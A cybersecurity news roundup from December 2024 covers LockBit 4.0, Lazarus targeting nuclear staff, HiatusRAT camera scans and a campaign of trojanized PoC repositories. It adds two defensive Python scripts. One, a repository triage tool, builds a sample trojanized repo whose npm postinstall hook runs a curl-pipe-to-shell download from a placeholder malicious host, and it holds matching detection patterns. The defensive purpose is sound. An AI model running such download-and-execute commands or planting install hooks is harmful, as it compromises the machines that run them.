SAN MATEO, CA, December 23, 2024 — Cybersecurity news weekly roundup. Stories, news, politics, and events that impacted the network security industry last week. Sponsored by NetworkTigers.
New LockBit ransomware coming in 2025
The February 2024 takedown of LockBit may have kept the group out of the spotlight for a while, but the ransomware gang’s administrator, LockBitSupp, is teasing a comeback in 2025 in the form of LockBit 4.0. Hyped with a message promising to send pen testers on a “billionaire journey” and listing five Tor sites and a new website, LockBit 4.0 is said to be due for release on February 3, 2025. A spokesperson for the training platform Cyber Threat Intelligence Academy said via social media: “[With] these five different onion links, it seems that LockBit is strengthening its infrastructure to take its operations one step further.” LockBitSupp is no stranger to inflated claims: “LockBit Green,” billed as a new version of the ransomware, turned out on analysis to be a rebranded Conti encryptor. Time will tell whether LockBit 4.0 puts the group back on the radar or ends up being its last breath. Read more.
Lazarus Group targets nuclear engineers
A long-running North Korean espionage campaign known as Operation Dream Job has been observed targeting at least two employees of an unnamed nuclear-related organization. According to Kaspersky, the attacks saw Lazarus Group operators deploy a new modular backdoor called CookiePlus. Kaspersky, which tracks the activity under the name NukeSped, said that one of the group’s two most common lures is a trojanized remote access tool disguised as a “skills assessment,” and that this was the pattern followed here. “Lazarus delivered the first archive file to at least two people within the same organization (we’ll call them Host A and Host B),” Kaspersky researchers Vasily Berdnikov and Sojun Ryu said. “After a month, they attempted more intensive attacks against the first target.” In its report on Lazarus activity, Kaspersky says that “new modular malware, such as CookiePlus, suggests that the group is constantly working to improve their arsenal and infection chains to evade detection by security products.” Read more.
CISA staffers worried about persecution
CISA staffers are expressing anxiety in the lead-up to Donald Trump’s return to the White House, fearing that promised cuts to government spending, combined with his grievance against the agency whose former director refuted his claims of 2020 election fraud, will see the organization gutted. “We believe it’s our responsibility to help those who don’t really have the ability to help themselves,” says one CISA employee. “We take our missions seriously, which is why we are all concerned, to a T, about if any decisions are going to affect our mission negatively.” Workers fear that the incoming administration’s distaste for corporate oversight could leave initiatives such as secure-by-design commitments and other corporate responsibility efforts toothless. The sense of impending politicization has prompted many CISA staffers to prepare for the worst, with some worried that a weakening of the agency will cause “big, well-respected individuals in the security community” to take their expertise elsewhere. Read more.
Meta fined $264 million for 2018 data breach
An investigation into a 2018 breach of Facebook has resulted in parent company Meta being hit with a $264 million fine by Ireland’s Data Protection Commission. Because Meta’s European headquarters is in Dublin, the Commission acts as its lead EU privacy regulator; it found multiple infringements of the General Data Protection Regulation (GDPR) connected to the incident, which allowed attackers to access user accounts. Meta will appeal the decision, saying it “relates to an incident from 2018. We took immediate action to fix the problem as soon as it was identified.” The company said it “proactively informed people impacted,” the Irish watchdog, other regulators, and the FBI. The attackers chained three bugs in Facebook’s “View As” feature to take control of user accounts. Read more.
TikTok election integrity investigation launched
Romania’s recent presidential election had its second round of voting canceled after a surprise surge in support for independent Calin Georgescu, a controversial far-right candidate whose views have been described as pro-Putin. Declassified Romanian intelligence documents state that tens of thousands of TikTok accounts were suddenly activated in the weeks before the first round of voting. The European Commission has now opened formal proceedings against the platform. “Following serious indications that foreign actors interfered in the Romanian presidential elections using TikTok, we are now thoroughly investigating whether TikTok has violated the Digital Services Act by failing to tackle such risks. It should be crystal clear that in the EU, all online platforms, including TikTok, must be held accountable,” Commission President Ursula von der Leyen said. Some TikTok posts promoting Georgescu were seemingly not labeled as election content, which Romanian law requires. Read more.
INTERPOL pushes to change pig butchering term
The term “pig butchering” is decidedly insulting to victims of said scams, and INTERPOL is hoping to change the linguistics to encourage more people to come forward after being ripped off. “The term ‘pig butchering’ dehumanizes and shames victims of such frauds, deterring people from coming forward to seek help and provide information to the authorities,” the agency said. INTERPOL is advocating for “romance baiting” as a replacement term for the fraud. The effort is not without support, with Google referring to the scams as “international online consumer investment fraud schemes.” “Words matter. We’ve seen this in the areas of violent sexual offenses, domestic abuse, and online child exploitation. We need to recognize that our words also matter to the victims of fraud,” INTERPOL Acting Executive Director of Police Services Cyril Gout said. “It’s time to change our language to prioritize respect and empathy for the victims and to hold fraudsters accountable for their crimes.” Read more.
Web cameras and DVRs under attack
The FBI has warned that HiatusRAT operators “conducted a scanning campaign targeting Internet of Things (IoT) devices in the US, Australia, Canada, New Zealand, and the United Kingdom… The actors scanned web cameras and DVRs for vulnerabilities including CVE-2017-7921, CVE-2018-9995, CVE-2020-25078, CVE-2021-33044, CVE-2021-36260, and weak vendor-supplied passwords.” The listed CVEs are years old and include authentication bypasses and a command injection in widely deployed Hikvision, Dahua and other camera and DVR firmware, so the campaign is opportunistic: unpatched devices still running default credentials are the target. The FBI has advised owners of vulnerable devices to limit their use and isolate them from the rest of the network so that a successful compromise cannot be used as a pivot. HiatusRAT is primarily used to “deploy additional payloads on infected devices, converting the compromised systems into SOCKS5 proxies for command-and-control server communication.” The FBI notes that the shift in targeting and the reconnaissance activity are consistent with the strategic interests of Chinese threat actors. Read more.
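The scanning behavior the FBI describes is visible in perimeter firewall logs even without any HiatusRAT indicators: one source touching many distinct camera or DVR hosts on the same handful of service ports in a short window. The following script is an added example written for this roundup, not part of the FBI advisory or any vendor tool; the log line format, the sample log, and the port list are constructed for it.

```python
"""Flag sources sweeping many camera/DVR hosts in firewall logs.

Added example (not from the FBI advisory or the article): a minimal
detection for the scanning behaviour described above. The log format,
sample lines and port list are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Ports commonly exposed by web cameras and DVRs: HTTP/HTTPS, RTSP, the
# Hikvision SDK port (8000) and the Dahua DVR port (37777). Assumption
# for this example; tune to what your own devices expose.
CAMERA_DVR_PORTS = {80, 443, 554, 8000, 8080, 37777}

# Constructed log format: ISO timestamp, src, dst, dport, action.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$"
)

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
        "src": m["src"], "dst": m["dst"], "dport": int(m["dport"]),
    }

def find_sweeps(lines, min_hosts=5, window=timedelta(minutes=10)):
    """Return {src: sorted distinct dst hosts} for every source that hit at
    least `min_hosts` distinct hosts on camera/DVR ports inside any span
    of length `window`. Repeated hits on one host never trigger."""
    hits = defaultdict(list)  # src -> [(ts, dst), ...]
    for line in lines:
        ev = parse_line(line)
        if ev and ev["dport"] in CAMERA_DVR_PORTS:
            hits[ev["src"]].append((ev["ts"], ev["dst"]))
    flagged = {}
    for src, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until it spans <= `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {dst for _, dst in events[start:end + 1]}
            if len(hosts) >= min_hosts:
                flagged[src] = sorted({dst for _, dst in events})
                break
    return flagged

# Constructed sample: 203.0.113.7 sweeps six hosts in five seconds,
# 198.51.100.4 talks repeatedly to one camera, 203.0.113.9 hits only
# three hosts, and an SSH probe on port 22 is ignored entirely.
SAMPLE_LOG = """\
2024-12-10T03:14:01Z src=203.0.113.7 dst=192.0.2.10 dport=80 action=DENY
2024-12-10T03:14:02Z src=203.0.113.7 dst=192.0.2.11 dport=80 action=DENY
2024-12-10T03:14:02Z src=203.0.113.7 dst=192.0.2.12 dport=8000 action=DENY
2024-12-10T03:14:03Z src=203.0.113.7 dst=192.0.2.13 dport=554 action=DENY
2024-12-10T03:14:04Z src=203.0.113.7 dst=192.0.2.14 dport=37777 action=DENY
2024-12-10T03:14:06Z src=203.0.113.7 dst=192.0.2.15 dport=80 action=DENY
2024-12-10T03:14:01Z src=198.51.100.4 dst=192.0.2.10 dport=80 action=ALLOW
2024-12-10T03:15:01Z src=198.51.100.4 dst=192.0.2.10 dport=80 action=ALLOW
2024-12-10T03:16:01Z src=198.51.100.4 dst=192.0.2.10 dport=80 action=ALLOW
2024-12-10T03:20:00Z src=203.0.113.9 dst=192.0.2.20 dport=80 action=DENY
2024-12-10T03:20:01Z src=203.0.113.9 dst=192.0.2.21 dport=80 action=DENY
2024-12-10T03:20:02Z src=203.0.113.9 dst=192.0.2.22 dport=80 action=DENY
2024-12-10T03:21:00Z src=203.0.113.9 dst=192.0.2.30 dport=22 action=DENY
"""

if __name__ == "__main__":
    for src, hosts in find_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{src} swept {len(hosts)} camera/DVR hosts: {', '.join(hosts)}")
```

The threshold and window are deliberately conservative; on a large /16 a real sweep will stand out far more, and the same grouping can be run against denied-connection events from any firewall once the regular expression is adapted to its log format. Isolation, as the FBI recommends, is what keeps a hit from becoming a SOCKS5 pivot into the rest of the network; this detection only tells you someone is looking.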
National Cyber Incident Response plan available for comment
CISA has released a draft update to the National Cyber Incident Response Plan after years of “broad and extensive engagement” with regulators, public- and private-sector partners, and a number of agencies. The objective of the refresh is a more “agile, actionable, updated framework that will provide coherent coordination that matches the pace of our adversaries and the predictable method for how to engage with us,” according to Jeff Greene, CISA’s executive assistant director for cybersecurity. Greene said that more than 150 cyber experts from 66 organizations contributed to the draft, in addition to three public listening sessions. A month-long public comment period has just begun and closes on January 15. Greene said that private-sector input into the plan was “essential from day one” and will be “essential going forward.” Read more.
Insurance claim-handling AI chatbot accessible on the internet
UnitedHealthcare’s Optum left an AI-powered chatbot, built to help employees handle customer health insurance claims and disputes, exposed to the internet and reachable from any web browser. The chatbot, dubbed “SOP Chatbot,” did not appear to give outsiders access to personal or protected health information, and Optum restricted it once the exposure was reported. Optum spokesperson Andrew Krejci said the chatbot “was a demo tool developed as a potential proof of concept” but was “never put into production, and the site is no longer accessible.” The news comes as UnitedHealthcare faces significant public scrutiny over its claim denials, multibillion-dollar profits, and the alleged use of an AI algorithm to find reasons to deny claims for medical care more efficiently. Read more.
390,000 WordPress credentials stolen from hackers
A threat actor tracked as MUT-1244 has engaged in a year-long campaign that targeted other hackers and stole 390,000 credentials using a trojanized WordPress credentials checker, according to findings from Datadog Security Labs. The firm reports that SSH private keys and AWS access keys were also taken from other victims, including red teamers, penetration testers, and security researchers. To infect their victims, MUT-1244 used the “same second-stage payload pushed via dozens of trojanized GitHub repositories delivering malicious proof-of-concept (PoC) exploits that targeted known security flaws, along with a phishing campaign prompting targets to install a fake kernel upgrade camouflaged as a CPU microcode update.” Datadog Security Labs believes that hundreds of systems are still compromised, with more to come, as the campaign appears to be ongoing. Read more.
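The lesson for anyone who runs public proof-of-concept code is that the exploit body is rarely where the trap is; the payload fires from whatever executes at build or install time. The following Python script is an added example written for this roundup, not Datadog’s tooling and not MUT-1244’s code: a static pre-run triage that walks a cloned repository and flags install-time hooks and download-and-execute one-liners. The sample repository it scans is constructed in a temporary directory, and the hostname in it is a placeholder.

```python
"""Static triage of a proof-of-concept repository before running it.

Added example, not Datadog's tooling or the campaign's code: flags the
install-time execution hooks and download-and-execute one-liners that a
trojanized PoC repo can use to run a payload the moment a researcher
builds or installs it. The sample repo is constructed below; the
hostname in it is a placeholder.
"""
import json
import os
import re
import tempfile

# Patterns that warrant a manual look before `make`, `pip install .` or
# `npm install` is run on an untrusted exploit repository.
SUSPICIOUS = [
    (re.compile(r"(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\beval\s*\("), "eval of generated code"),
    (re.compile(r"chmod\s+\+x\b"), "marks a file executable"),
]
# npm lifecycle scripts that run automatically on `npm install`.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")

def triage_file(path):
    """Return [(path, reason), ...] for one file."""
    findings = []
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            text = f.read()
    except OSError:
        return findings
    name = os.path.basename(path)
    if name == "package.json":
        try:
            scripts = json.loads(text).get("scripts", {})
        except ValueError:
            scripts = {}
        for hook in NPM_HOOKS:
            if hook in scripts:
                findings.append((path, f"npm {hook} hook: {scripts[hook]}"))
    if name == "setup.py" and re.search(r"cmdclass\s*=", text):
        # a custom install command class runs arbitrary code on pip install
        findings.append((path, "setup.py overrides install commands"))
    for pattern, reason in SUSPICIOUS:
        if pattern.search(text):
            findings.append((path, reason))
    return findings

def triage_repo(root):
    """Walk a checked-out repository (skipping .git) and collect findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for fn in filenames:
            findings.extend(triage_file(os.path.join(dirpath, fn)))
    return findings

def build_sample_repo():
    """Constructed trojanized-PoC layout for demonstration only: the
    exploit file is clean, the npm postinstall hook runs a shell script
    that fetches and executes a remote payload."""
    root = tempfile.mkdtemp(prefix="poc-triage-")
    files = {
        "exploit.py": "import requests\n# harmless-looking PoC body\n",
        "package.json": json.dumps({"name": "poc", "scripts": {
            "postinstall": "node -e \"require('child_process').exec('sh setup.sh')\""}}),
        "setup.sh": "curl -s http://malicious.example.com/x | sh\n",
        "Makefile": "all:\n\tgcc exploit.c -o exploit\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    return root

if __name__ == "__main__":
    for path, reason in triage_repo(build_sample_repo()):
        print(f"{reason}: {os.path.basename(path)}")
```

This is a heuristic, not a verdict: a repo that hides its payload in a compiled binary or an obfuscated dependency will pass it, which is exactly why a PoC from an unknown account still belongs in a disposable VM with no SSH keys or cloud credentials on it. The same caution applies to the campaign’s other lure; a CPU microcode update arrives through the distribution’s signed package channel, not as a download a phishing email asks you to run.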